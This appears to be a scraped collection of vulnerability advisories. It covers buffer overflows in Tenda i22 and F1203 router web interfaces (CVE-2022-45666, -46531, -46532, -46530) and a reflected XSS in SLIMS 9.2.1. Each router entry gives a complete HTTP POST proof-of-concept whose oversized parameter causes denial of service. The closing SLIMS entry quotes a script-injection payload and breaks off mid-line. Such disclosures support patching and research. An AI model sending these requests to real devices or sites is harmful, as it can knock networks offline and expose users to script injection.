Tenda i22 V1.0.0.3(4687) was discovered to contain a buffer overflow via the list parameter in the formwrlSSIDset function.

Tenda Router **i22 V1.0.0.3(4687)** was discovered to contain a buffer overflow in the httpd module when handling /goform/wifiSSIDset request.

This vulnerability lies in the /goform/wifiSSIDset page，The details are shown below:

This POC can result in a Dos.

    POST /goform/wifiSSIDset HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 2068
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.204.133
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.204.133/system_hostname.asp?version=1487847846
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: bLanguage=cn; password=jbl1qw; user=
    Connection: close
    
    wl_radio=0&index=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-45666: CVE-vulns/formwrlSSIDset.md at main · Double-q1015/CVE-vulns

Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the deviceId parameter at /goform/addWifiMacFilter.

Tenda Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the httpd module when handling /goform/addWifiMacFilter request.

This vulnerability lies in the /goform/addWifiMacFilter page，The details are shown below:

This POC can result in a Dos.

    POST /goform/addWifiMacFilter HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 4111
    
    deviceId=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-46531: CVE-vulns/addWifiMacFilter_deviceId.md at main · Double-q1015/CVE-vulns

Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the deviceMac parameter at /goform/addWifiMacFilter.

Tenda Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the httpd module when handling /goform/addWifiMacFilter request.

This vulnerability lies in the /goform/addWifiMacFilter page，The details are shown below:

This POC can result in a Dos.

    POST /goform/addWifiMacFilter HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 4111
    
    deviceMac=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-46532: CVE-vulns/addWifiMacFilter_deviceMac.md at main · Double-q1015/CVE-vulns

Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the mac parameter at /goform/GetParentControlInfo.

Tenda Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the httpd module when handling /goform/GetParentControlInfo request.

This vulnerability lies in the /goform/GetParentControlInfo page，The details are shown below:

This POC can result in a Dos.

    POST /goform/GetParentControlInfo HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 2055
    
    mac=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-46530: CVE-vulns/GetParentControlInfo.md at main · Double-q1015/CVE-vulns

Senayan Library Management System version 9.2.1 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.2.1 a.k.a SLIMS 9XSS-Reflected - inserting gif - redirect to outside HTTPS server## Author: nu11secur1ty## Date: 12.20.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.2.1/slims9_bulian-9.2.1.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload t8xqv<script>alert(1)</script>uou2q was submitted in themanual insertion `point 3`.This input was echoed unmodified in the application's response.The attacker can trick the already authenticated users to visit anvery dangerous web page ot malicious javascript exploit.## STATUS: HIGH Vulnerability[+] Payloads:```GETGET 